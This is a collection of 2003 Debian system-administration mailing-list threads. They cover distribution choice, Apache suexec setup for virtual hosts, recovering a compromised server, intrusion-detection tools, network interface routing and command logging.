Re: Slightly OT: They're forcing me to install Red Hat
I've spent time in both redhat & debian (though mostly in debian) apt-get update ; apt-get upgrade -s ; apt-get upgrade # if OK ...is zero $ up2date # $50 per year per machine. # fewer built in packages If $ is a concern to your boss, then postgres is probably the equal of oracle for most people. Postgres is supported on debian. Another factor, moving from potato to woody was trivial. I **think** the upgrade process for redhat involves fdiskbut this may be different for the $500 enterprise version. On Tue, 17 Jun 2003, Tomàs Núñez Lirola wrote: > WARNING: The following data has NOT been sanitized, to ensure > that the signature remains intact, if valid. Please > be careful if you open any enclosed attachments. > > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Hi > My boss is forcing me to install Red Hat. I am the sysad, and I personally > prefer Debian, but it don't seem to be a reason for him. He worries about > Oracle not giving support to Debian users. But we don't have any Oracle > server, he worries for the future. > So, can you give me reasons to convince him to install Debian? I don't know > Red Hat very well, because I've never felt comfortable with it (but this > don't seem to be a reason for anyone :( ). > > Sorry for the slightly OT > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.2.2 (GNU/Linux) > > iD8DBQE+7v9EiQmYUmmD5jgRAmUHAJ0YMXVRz7LChWWo6J0bY1P+6LSNKQCcDRL8 > 0JSPaQOkkk0gH+5xBajs11k= > =c9xv > -END PGP SIGNATURE- > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Frozen Food Delivery Canada
> Must resist urge to call them.. *twitch* Since there is a small chance they are being DOS'd via forgery this would be a good urge to resist. On Wed, 18 Jun 2003, Splash Tekalal wrote: > At 12:26 PM 6/18/2003 -0400, you wrote: > >NORSEMAN CARTAGE LTD. > >2458 HAINES RD > >MISSISSAUGA, ONTARIO, CANADA > >L4Y 1Y6 > >(905)275-0093 > >WWW.NORSEMANCARTAGE.COM > > Must resist urge to call them.. *twitch* > > > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
review host based intrusion detection sytems
Doing an apt-cache search on "tripwire" and "intrusion" I came up with these packages: aide bsign fcheck integrit I've googled around a bit but haven't found much evaluation... Does anyone have opinions on them? We're setting up 3 new servers and I want to have an intrusion detection database. Ease of use is much, much more important then perfect security. A while back we installed tripwire from tarball on one system but let it get out of date. At another job, they had a homegrown system that is very cumbersome,--lots and lots of false alarms and a pain to update. Of course it would be extra valuable if you could compare and contrast two or more of these packages. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: CGI and PHP Scripts
> (I have tried using suexec as it is installed with the Debian Apache > package, but when I tried to execute a script in a virtual host, not > using the www.domain.com/~username address, it did not execute the > script, saying it was not in the document root. Does anyone know what the default document root is /var/www If you are setting up apache from scratch, I'd use the default as it avoids much hassle w/ suexec. If you want to use a different default docroot you need to recompile suexec For our approach see: http://csl.ltc.org/sys/project.d/suexec.d/install.txt On Tue, 24 Jun 2003, Anand Atreya wrote: > Hi, > > I have just recently begun using Debian and am in the process of > migrating a FreeBSD 4.4 server over to it. This server had many > different users and allowed them to execute CGI and PHP scripts in their > public_html folder (or any folder under it) as their own user, not as > the user of the webserver, using mod_cgiwrap and mod_phpcgiwrap (from > Steven Haryanto). The site where this was located > (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer exists, > and in hindsight, it seems as if mod_cgiwrap was not a very secure > solution to begin with. > Does anybody have any recommendations on how to set up a virtual hosting Apache > server such that users can have CGI and PHP scripts execute as themselves, without > having to put #!/usr/bin/php at the top of php scripts, and that is completely > transparent to the user, also allowing them to place scripts anywhere in their > document root? > (I have tried using suexec as it is installed with the Debian Apache > package, but when I tried to execute a script in a virtual host, not > using the www.domain.com/~username address, it did not execute the > script, saying it was not in the document root. Does anyone know what > the default document root is for the Debian configuration of suexec?) > > Thanks a lot. > -- Anand Atreya > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Server hacked - next...?
chkrootkit is also avaialble through apt-get apt-get install chkrootkit ## On Sun, 29 Jun 2003, Jason Lim wrote: > Hi Russell, > > Well, SE Linux certainly seems like something that needs to be installed. > Most annoying is that all the recent security updates were already done! > > The user CGIs run as the user's UID... suexec. > > > Re-installing from scratch would be a real pain... the server runs on a > 3ware array, and has hundreds of users, all active :-/ > > Is there any way to verify the Integrity of the files somehow, and > download/re-install any binaries that do not match the checksums or > something? Does dpkg or some other Debian tool have this ability? > > If just a list of packages could be shown that do not match what is > actually on the disk, those could be re-downloaded and re-installed, so at > least the system can start working (right now, just typing "gcc" produces > garbage on the screen, no doubt because some libraries have been > replaced). > > Is there any tool that could search the system for root suid scripts (so > the hacker can login again and gain root easily)? > > > Hope you can shed some light on the above, so at least the system can get > back up and running, then we can even setup a new server (with SE Linux > and various others) and migrate the accounts over. > > Thanks in advance!!! > > Sincerely, > Jason > > - Original Message - > From: "Russell Coker" <[EMAIL PROTECTED]> > To: "Jason Lim" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> > Sent: 29 June, 2003 4:02 PM > Subject: Re: Server hacked - next...? > > > > On Sun, 29 Jun 2003 17:12, Jason Lim wrote: > > > The box is a very recently updated "stable" box... virtually every > other > > > date apt-get is update/upgrade. > > > > > > The box is setup very secure... the usual things were done... like > > > ensuring no unused services are running and things like that. > > > > > > So does that mean "stable" is actually vulnerable to something we all > > > don't know about??? > > > > That could be the case. > > > > Or it could be some issue of your configuration. Maybe you have Apache > set to > > run customer cgi-bin scripts under the same UID and a customer uploaded > an > > insecure or hostile cgi-bin script. > > > > Have you considered using SE Linux? > > > > -- > > http://www.coker.com.au/selinux/ My NSA Security Enhanced Linux > packages > > http://www.coker.com.au/bonnie++/ Bonnie++ hard drive benchmark > > http://www.coker.com.au/postal/Postal SMTP/POP benchmark > > http://www.coker.com.au/~russell/ My home page > > > > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Anyone running Exim 3.3x + Mysql Virtual users?
I had a similar experience, decided to look at postfix and then never looked back. On Mon, 30 Jun 2003, Dustin Douglas wrote: > I've got the chance to set up a brand new email server for one of our > clients, and being the forward thinking sysadmin that I am, I don't > want to go with the old standby Sendmail, I've got 2 of the beasts > already, and don't want another. > > I've been looking at Exim in Debian Stable and it looks pretty good, > but I'm getting bogged down trying to get everything configured > properly, and I want to give Exim a fair shot. I don't want to give up > on it just because I'm missing something. > > So, anyone have any good pointers to cookbook/HOWTO type docs about > setting up Mysql& Exim with an eye towards virtual users? I've seen > some guides for Exim 4.1x, but Stable uses the older 3.3x line, and > I'd very much like to keep the install as stock as possible. > > Thanks for any pointers... > > Have a good one. > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Wrapping CGI and PHP Scripts
>Does anyone know what the default document >root is for the Debian configuration of suexec? /var/www/ To change the document root of suexec you need to recompile suexec see: http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt ### On Wed, 2 Jul 2003, Anand Atreya wrote: > Hi, > > I have just recently begun using Debian and am in the process of > migrating a FreeBSD 4.4 server over to it. This server had many different > users and allowed them to execute CGI and PHP scripts in their public_html > folder (or any folder under it) as their own user, not as the user of the > webserver, using mod_cgiwrap and mod_phpcgiwrap (from Steven Haryanto). The > site where this was located > (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer exists, and > in hindsight, it seems as if mod_cgiwrap was not a very secure solution to > begin with. > Does anybody have any recommendations on how to set up a virtual hosting > Apache server such that users can have CGI and PHP scripts execute as > themselves, without having to put #!/usr/bin/php at the top of php scripts, > and that is completely transparent to the user, also allowing them to place > scripts anywhere in their document root? > (I have tried using suexec as it is installed with the Debian Apache > package, but when I tried to execute a script in a virtual host, not using > the www.domain.com/~username address, it did not execute the script, saying > it was not in the document root. Does anyone know what the default document > root is for the Debian configuration of suexec?) > > Thanks a lot. > -- Anand Atreya > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Wrapping CGI and PHP Scripts
> If only this could be in a configuration file.. What is worse is that every time there is a security patch for apache, we break our hand compiled suexec On Thu, 3 Jul 2003, Jason Lim wrote: > > > > > > >Does anyone know what the default document > > >root is for the Debian configuration of suexec? > > > > /var/www/ > > > > To change the document root of suexec you need to recompile suexec see: > > > > http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt > > > If only this could be in a configuration file.. > > > > > > ### > > On Wed, 2 Jul 2003, Anand Atreya wrote: > > > > > Hi, > > > > > > I have just recently begun using Debian and am in the process of > > > migrating a FreeBSD 4.4 server over to it. This server had many > different > > > users and allowed them to execute CGI and PHP scripts in their > public_html > > > folder (or any folder under it) as their own user, not as the user of > the > > > webserver, using mod_cgiwrap and mod_phpcgiwrap (from Steven > Haryanto). The > > > site where this was located > > > (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer > exists, and > > > in hindsight, it seems as if mod_cgiwrap was not a very secure > solution to > > > begin with. > > > Does anybody have any recommendations on how to set up a virtual > hosting > > > Apache server such that users can have CGI and PHP scripts execute as > > > themselves, without having to put #!/usr/bin/php at the top of php > scripts, > > > and that is completely transparent to the user, also allowing them to > place > > > scripts anywhere in their document root? > > > (I have tried using suexec as it is installed with the Debian > Apache > > > package, but when I tried to execute a script in a virtual host, not > using > > > the www.domain.com/~username address, it did not execute the script, > saying > > > it was not in the document root. Does anyone know what the default > document > > > root is for the Debian configuration of suexec?) > > > > > > Thanks a lot. > > > -- Anand Atreya > > > > > > > > > > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Wrapping CGI and PHP Scripts
We use the shbang... On Wed, 2 Jul 2003, Anand Atreya wrote: > Any recommendations on how to do this with PHP - without needing the > #!/bin/sh > echo DEFANGED.0 > exit > #!/usr/bin/php at the top and without using PHP Safe mode - which is a lame > workaround...? > > -- Anand > > - Original Message - > From: "Dan MacNeil" <[EMAIL PROTECTED]> > To: "Jason Lim" <[EMAIL PROTECTED]> > Cc: "Anand Atreya" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> > Sent: Wednesday, July 02, 2003 9:33 PM > Subject: Re: Wrapping CGI and PHP Scripts > > > > > > > If only this could be in a configuration file.. > > > > What is worse is that every time there is a security patch for apache, we > > break our hand compiled suexec > > > > On Thu, 3 Jul 2003, Jason Lim wrote: > > > > > > > > > > > > > > > > >Does anyone know what the default document > > > > >root is for the Debian configuration of suexec? > > > > > > > > /var/www/ > > > > > > > > To change the document root of suexec you need to recompile suexec > see: > > > > > > > > http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt > > > > > > > > > If only this could be in a configuration file.. > > > > > > > > > > > > > > ### > > > > On Wed, 2 Jul 2003, Anand Atreya wrote: > > > > > > > > > Hi, > > > > > > > > > > I have just recently begun using Debian and am in the process of > > > > > migrating a FreeBSD 4.4 server over to it. This server had many > > > different > > > > > users and allowed them to execute CGI and PHP scripts in their > > > public_html > > > > > folder (or any folder under it) as their own user, not as the user > of > > > the > > > > > webserver, using mod_cgiwrap and mod_phpcgiwrap (from Steven > > > Haryanto). The > > > > > site where this was located > > > > > (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer > > > exists, and > > > > > in hindsight, it seems as if mod_cgiwrap was not a very secure > > > solution to > > > > > begin with. > > > > > Does anybody have any recommendations on how to set up a virtual > > > hosting > > > > > Apache server such that users can have CGI and PHP scripts execute > as > > > > > themselves, without having to put #!/usr/bin/php at the top of php > > > scripts, > > > > > and that is completely transparent to the user, also allowing them > to > > > place > > > > > scripts anywhere in their document root? > > > > > (I have tried using suexec as it is installed with the Debian > > > Apache > > > > > package, but when I tried to execute a script in a virtual host, not > > > using > > > > > the www.domain.com/~username address, it did not execute the script, > > > saying > > > > > it was not in the document root. Does anyone know what the default > > > document > > > > > root is for the Debian configuration of suexec?) > > > > > > > > > > Thanks a lot. > > > > > -- Anand Atreya > > > > > > > > > > > > > > > > > > > > > > > > > > > -- > > > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > > > with a subject of "unsubscribe". Trouble? Contact > > > [EMAIL PROTECTED] > > > > > > > > > > > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: mod_perl and mod_asp
One reason to avoid mod_perl is memory consumption. CGI scripts take up memory only when they are running. --You can have hundreds of CGI scripts on your server. When we moved to mod_perl our apache processes moved from taking about 3M each to about 8M each. With a 100 processes this might be an issue for you. On the other hand if you are running a cgi script more than twice a second, mod_perl is a big win. To answer your question, putting SSL & mode_perl on the same server works fine for us. You might think of separate servers for CGI and mod_perl though. On Fri, 11 Jul 2003, Rod Rodolico wrote: > Ok, this is likely a major stupid question. > > I need mod_asp for my apache 1.3 server. I installed mod_perl and mod_asp > via dselect on my development server, but see no configuration changed in > httpd.conf. I see no sign that mod_perl or mod_asp were installed, and > have discovered no way to see what modules are loaded by an instance of > apache. > > Is mod_perl loaded via some kind of pfm? I have rtfm'd, but haven't seen > anything on the mod_perl v1 being loaded as a module. > > I basically have no clue what is going on here. Is it loaded? Is there a > way to verify it? Or, do I need to add a LoadModule mod_perl entry. I > tried that, but mod_perl was not found in mod_perl.so > > Finally, is there any reason I should not build a mod_perl & mod_ssl > version of apache? I use ssl on some of my sites, and I write a lot of > perl cgi scripts. Currently, my production server has an apache-ssl and a > standard apache server running (two servers), and I need the ability to > run perl on both. I'm thinking I should have only one server, with the > ability to run ssl and perl. Suggestions? > > Thanks > > Rod > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
storage server howto?
We want to create a debain based storage server and mount /var/www/ /home and other directories from it onto other servers and workstations. Right now we're looking at smaba, autofs, amd, smbfs. We've heard bad things about NFS security, but maybe we haven't looked at it close enough. What is the best way to run a storage server and mount its shares on other machines? Has anyone else out there had any success in using autofs or amd in combination with smbmount to do this? Is autofs or amd even necessary (network mount can be added as type smbfs in fstab)? We've looked at: Automount mini-Howto http://www.tldp.org/HOWTO/mini/Automount.html Autofs Automounter HOWTO http://www.linux-consulting.com/Amd_AutoFS/autofs-HOWTO.html Tried: modifying /etc/fstab to mount smbfs partition -- ran into the username/password and permissions issues below amd package -- seems to be oriented towards using NFS, but the autofs autmounter howto does mention samba towards the bottom of section 5.3 Problems: smbmount requires username and password - this seems to be fixable by using a file containing credentials and making it viewable only by the owner permissions on mounted directory - did a sample mount and the file permissions for home directories ended up being 755 root root instead of 755 user group - perhaps this problem can be remedied by the machines sharing the same passwd and shadow files (in the long run LDAP will be used) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
apt-get update failure???
We've a couple debian systems to patch for the new sshd problems. On one of them that is monitored closely and patched quickly. The other is patched less quickly. The system that is patched less quickly claims to be up to date but nobody remembers patching it. There are some wierd things about file sizes & strings on the less closely monitored system. Are we missing something? apt-get update; apt-get upgrade; [snip] 0 packages upgraded, 0 newly installed, 0 to remove and 0 not upgraded. I've looked (quickly) at the man pages, but am a bit short of sleep and have probably missings some basic answers. Where are the logs? Is there a way to force a package update/re-install? Further some important files have different sizes # less closely monitored system -rwxr-xr-x1 root root 230216 Oct 13 2002 /usr/bin/ssh # more closely monitored system -rwxr-xr-x1 root root 230248 Sep 16 22:07 /usr/bin/ssh and different strings: # less closely monitored #strings /usr/bin/ssh | grep OpenSSH OpenSSH_3.4p1 Debian 1:3.4p1-4 OpenSSH_3.4p1 Debian 1:3.4p1-4 # more closely monitored #strings /usr/bin/ssh | grep OpenSSH OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.2 OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.2 # both systems have sources.list as: deb http://debian.lcs.mit.edu/debian woody main contrib non-free deb http://http.us.debian.org/debian woody main contrib non-free deb http://security.debian.org/ woody/updates main contrib non-free deb http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: removabale caddies
>information regarding the removable caddies? > > I am interested for information, specs, and esp uses and suppliers. IS --- Here's a bit recycled from something I did for a youth center Dunno if it works for you in Oz. Google is my only connection with the vendor. --- Hard drive drawers and caddies. These allow to quickly swap hard drives without tools or futzing with jumpers. The more expensive models let you swap hard drives in and out while the computer is running. The benefits that removable hard drives solve are: 1) Most of the benefit of several completely different computer setups at the cost of several hard drives. 2) Simpler disc imaging. If a computer setup is bad you can pull the hard drive, replace it with one from the shelf, stick the mis configured hard drive into an 'imaging' station and restore it and put it on the shelf. These are the ones I've used for a couple years. I've had a couple 5-6 recycled year old hard drives fail. (maybe because they were dropped on the floor) The keys tend to wear out, but since you get extra keys this isn't a big deal. http://www.provantage.com/buy-7STRP007-ata-66-100-plastic-hard-drive-drawer-w-fan-startech-computer-parts-ide66basic-shopping.htm This model is more expensive but perhaps more durable and certainly more stylish. http://www.provantage.com/buy-7STRP071-startech-computer-parts-black-removable-ide-drive-drawer-rugged-w-shock-absorbers-drw113atabk-shopping.htm This model is made of metal instead of plastic and is probably more durable still. However, I wouldn't use the hot swapping software. http://www.provantage.com/buy-7STRP06Y-startech-computer-parts-black-aluminum-ide-drive-drawer-w-shock-absorbers-drw115atabk-shopping.htm -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: CGI and Virtual Hosts
You probably want to run suexec which runs cgi as a specific user. Our project docs --including links to the real docs are here: http://www.communitysoftwarelab.org/sys/project.d/suexec.d/ It is easy if you have not changed DocumentRoot from /var/www On Fri, 3 Oct 2003, Antonin Karasek wrote: > Hi, > I want to enable CGI on my web-hosting server, but I can't find out a good > security model (permitions of files). I don't want files to be readable for > others and don't want CGI to run apache's group. The main problem is, that > the files must belong to the same group as CGI is run. > > The best solution could be to chroot CGI scripts, but Apache can't do this > (I think). > > Could anybody send me some useful links? > > Many thanks > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: CGI and Virtual Hosts
> has documentation on it. As far as I've experenced, you need 1 IP address > per user, but I hear you can run any number of users off the same IP > address. We are running many sites w/ suexec on (1) IP number. NameVirtualHost 129.63.24.92 ServerAdmin [EMAIL PROTECTED] ServerName $host ServerAlias www.$host DocumentRoot /home/sites/$directory/doc_root User $directory Group $directory ErrorLog /var/log/apache/sites/$directory/error.log CustomLog /var/log/apache/sites/$directory/referer.log referer CustomLog /var/log/apache/sites/$directory/combined.log combined Alias /reports /home/sites/$directory/reports ScriptAlias /cgi-bin /home/sites/$directory/cgi-bin AllowOverride None Options IncludesNOEXEC ExecCGI ScriptAlias /kwiki /home/sites/$directory/kwiki DirectoryIndex index.html AllowOverride None Options IncludesNOEXEC ExecCGI On Fri, 3 Oct 2003, Daxal Communications - Surf the USA wrote: > Apache has increased CGI security by means of suexec. The Apache website > has documentation on it. As far as I've experenced, you need 1 IP address > per user, but I hear you can run any number of users off the same IP > address. > > If you discover how to enable suexec to allow any number of users to use the > same IP address, I'd be interested. I am currently using mass virtual > hosting with %0 as a virtualscriptalias and virtualdocumentroot delimiter. > eg, /var/webhosting/%0/docroot/ > > Cheers, > > > Scott > > - Original Message - > From: "Antonin Karasek" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Friday, October 03, 2003 1:38 PM > Subject: CGI and Virtual Hosts > > > > Hi, > > I want to enable CGI on my web-hosting server, but I can't find out a good > > security model (permitions of files). I don't want files to be readable > for > > others and don't want CGI to run apache's group. The main problem is, that > > the files must belong to the same group as CGI is run. > > > > The best solution could be to chroot CGI scripts, but Apache can't do this > > (I think). > > > > Could anybody send me some useful links? > > > > Many thanks > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > > > > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: CGI and Virtual Hosts
> Can I ask, how many Virtual Hosts are you handling on one computer? I think > it can't be very efective (see my previous mail). We're doing about 50 virtual hosts that are very lightly used. > This solution is nice, but it's using PerChild module - I think. As far as I know we are not using anything called PerChild module --just straight suexec which is called to execute each cgi script. > I don't see any SuexecUserGroup directive :o) User $directory Group $directory We're also using mod_macro and mod_include in /etc/httpd.conf there is a line like: include /etc/apache/sites.txt In the /etc/sites.txt: there are lines like: Use Site eldermentaleldermentalhealth.org --The include lines are after the macro definitions. # On Fri, 3 Oct 2003, Antonin Karasek wrote: > I don't see any SuexecUserGroup directive :o) > > This solution is nice, but it's using PerChild module - I think. > > Can I ask, how many Virtual Hosts are you handling on one computer? I think > it can't be very efective (see my previous mail). > > Dan MacNeil writes: > > > > >> has documentation on it. As far as I've experenced, you need 1 IP address > >> per user, but I hear you can run any number of users off the same IP > >> address. > > > > We are running many sites w/ suexec on (1) IP number. > > > > > > > > NameVirtualHost 129.63.24.92 > > > > > > > >ServerAdmin [EMAIL PROTECTED] > >ServerName $host > >ServerAlias www.$host > >DocumentRoot /home/sites/$directory/doc_root > >User $directory > >Group $directory > > > >ErrorLog /var/log/apache/sites/$directory/error.log > >CustomLog /var/log/apache/sites/$directory/referer.log referer > >CustomLog /var/log/apache/sites/$directory/combined.log combined > > > >Alias /reports /home/sites/$directory/reports > > > >ScriptAlias /cgi-bin /home/sites/$directory/cgi-bin > > > > AllowOverride None > > Options IncludesNOEXEC ExecCGI > > > > > >ScriptAlias /kwiki /home/sites/$directory/kwiki > > > > DirectoryIndex index.html > > AllowOverride None > > Options IncludesNOEXEC ExecCGI > > > > > > > > > > > > > > > > > > > > > > On Fri, 3 Oct 2003, Daxal Communications - Surf the USA wrote: > > > >> Apache has increased CGI security by means of suexec. The Apache website > >> has documentation on it. As far as I've experenced, you need 1 IP address > >> per user, but I hear you can run any number of users off the same IP > >> address. > >> > >> If you discover how to enable suexec to allow any number of users to use the > >> same IP address, I'd be interested. I am currently using mass virtual > >> hosting with %0 as a virtualscriptalias and virtualdocumentroot delimiter. > >> eg, /var/webhosting/%0/docroot/ > >> > >> Cheers, > >> > >> > >> Scott > >> > >> - Original Message - > >> From: "Antonin Karasek" <[EMAIL PROTECTED]> > >> To: <[EMAIL PROTECTED]> > >> Sent: Friday, October 03, 2003 1:38 PM > >> Subject: CGI and Virtual Hosts > >> > >> > >> > Hi, > >> > I want to enable CGI on my web-hosting server, but I can't find out a good > >> > security model (permitions of files). I don't want files to be readable > >> for > >> > others and don't want CGI to run apache's group. The main problem is, that > >> > the files must belong to the same group as CGI is run. > >> > > >> > The best solution could be to chroot CGI scripts, but Apache can't do this > >> > (I think). > >> > > >> > Could anybody send me some useful links? > >> > > >> > Many thanks > >> > > >> > > >> > -- > >> > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > >> > with a subject of "unsubscribe". Trouble? Contact > >> [EMAIL PROTECTED] > >> > > >> > > >> > >> > >> > > > > > > > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: CGI and Virtual Hosts
>Why is this doubled? Is this intentional? Copy and paste slip. In the config file they are not doubled. On Sat, 4 Oct 2003, Marcin Owsiany wrote: > On Fri, Oct 03, 2003 at 04:40:51PM -0400, Dan MacNeil wrote: > > > > AllowOverride None > > Options IncludesNOEXEC ExecCGI > > > [...] > > > > DirectoryIndex index.html > > AllowOverride None > > Options IncludesNOEXEC ExecCGI > > > > Why is this doubled? Is this intentional? > > Marcin > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: two nic same server
I can't answer you question for sure, but have a vaguely similar question about two network cards in the same server. We have (2) nics in our main server. One faces our internal network runs samba & the like, the other faces the outside world and runs apache and the like. The internal network has a separate NAT gateway on a completely different machine. To get this setup to work we needed a: route add default gw 129.63.24.254 ...which is in /etc/init.d/rc.local Putting the gateway in /etc/network/interfaces didn't work. When we reboot, everything is fine. When people do a ifup eth1, things don't work unless they also do a rc.local People have a habit of forgetting the rc.local bit... We could easily wrap ifup with something like: #!/bin/sh # this ifup is in path before /sbin/ifup route add default gw 129.63.24.254 /sbin/ifup $1 ...but I am concerned that we will then forget this information. 1) In general does it make some to avoid hiding too config details? 2) Is there a better way to do this than in rc.local? On Wed, 8 Oct 2003, Leonardo Boselli wrote: > I have a server that has two network addresses. > According the network of origin of the call could be accessible one or > the other or both the address. > How should i arrange in the DNS the two addresses so a client if does > not found the first one, would try on the second ? (i do not need load > balancing but just increase availability, 2nd channel is very slow ...) > -- > Leonardo Boselli > Nucleo Informatico e Telematico del Dipartimento Ingegneria Civile > Universita` di Firenze , V. S. Marta 3 - I-50139 Firenze > tel +39 0554796431 cell +39 3488605348 fax +39 055495333 > http://www.dicea.unifi.it/~leo > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: two nic same server
Rod & Frode, Thanks for your help. (Rod I took the liberty of replying to the list w/o without your email as your answer may be helpful to other people.) = Frode Haugsgjerd wrote: see the manpage interfaces(5), specifically the up command. auto eth1 iface eth1 inet static ... up route add default gw 129.63.24.254 and: On Thu, 9 Oct 2003, Rod Rodolico wrote: > put the route command in /etc/network/interfaces. There is a command that executes > arbitrary > commands when ifup (or ifdown) is called. See following example from one of my > machines. > > iface eth0 inet static > address 67.66.8.41 > netmask 255.255.255.248 > network 67.66.8.120 > broadcast 67.66.8.127 > up /sbin/route add -host 67.66.8.41 eth0 > gateway 67.66.8.46 > > > > > I can't answer you question for sure, but have a vaguely similar > > question about two network cards in the same server. > > > > We have (2) nics in our main server. One faces our internal network runs > > samba & the like, the other faces the outside world and runs apache and > > the like. > > > > The internal network has a separate NAT gateway on a completely different > > machine. > > > > To get this setup to work we needed a: > > > > route add default gw 129.63.24.254 > > > > ...which is in /etc/init.d/rc.local > > > > Putting the gateway in /etc/network/interfaces didn't work. > > > > When we reboot, everything is fine. When people do a ifup eth1, things > > don't work unless they also do a rc.local People have a habit of > > forgetting the rc.local bit... > > > > We could easily wrap ifup with something like: > > > > #!/bin/sh > > # this ifup is in path before /sbin/ifup > > > > route add default gw 129.63.24.254 > > /sbin/ifup $1 > > > > ...but I am concerned that we will then forget this information. > > > > 1) In general does it make some to avoid hiding too config details? > > 2) Is there a better way to do this than in rc.local? > > > > > > > > On Wed, 8 Oct 2003, Leonardo Boselli wrote: > > > >> I have a server that has two network addresses. > >> According the network of origin of the call could be accessible one or > >> the other or both the address. > >> How should i arrange in the DNS the two addresses so a client if does > >> not found the first one, would try on the second ? (i do not need load > >> balancing but just increase availability, 2nd channel is very slow ...) > >> -- > >> Leonardo Boselli > >> Nucleo Informatico e Telematico del Dipartimento Ingegneria Civile > >> Universita` di Firenze , V. S. Marta 3 - I-50139 Firenze > >> tel +39 0554796431 cell +39 3488605348 fax +39 055495333 > >> http://www.dicea.unifi.it/~leo > >> > >> > >> > > > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [Cadre-config] Re: two nic same server
You can't do precisely what you want with DNS You can define two A records with two IP# for the same host. The DNS server will alternate the IP address it hands out "round robin DNS" There are ways to do what you want, but A) I don't know any of the details B) It might be easier/cheaper to get a single better network connection On Fri, 10 Oct 2003, Leonardo Boselli wrote: > On Thu, 9 Oct 2003, Dan MacNeil wrote: > > Rod & Frode, > > Thanks for your help. (Rod I took the liberty of replying to > > the list w/o without your email as your answer may be helpful > > to other people.) > Hey ! My question was different. > I appreciate your help, but my original question was different: > I have one machine that is accessible either with an address a.b.c.d or > with an address e.f.g.h . > the first one has a very good connection but at certain times for > periods between a few minutes to some hour could be unreacheable from > some networks. The second conenction is much more viable, but is vry > slow. > The question was: how can i set a DNS so any client would use the first > connection, unless it is ureacheable for more than 2 minutes, in which > case would use second one ? > > > ___ > Cadre-config mailing list > [EMAIL PROTECTED] > http://lists.ltc.org/mailman/listinfo/cadre-config > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
command logging
For a box that will have limited shell access, I'm looking for something that will log all commands. The sudo log is nice but not everything is run through sudo. There won't be many privacy issues as most users won't have shell. The goal is to review a daily report for anything unexpected: stuff like: tar -xzf rootkit.tar.gz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
tracking down i/o sucking process
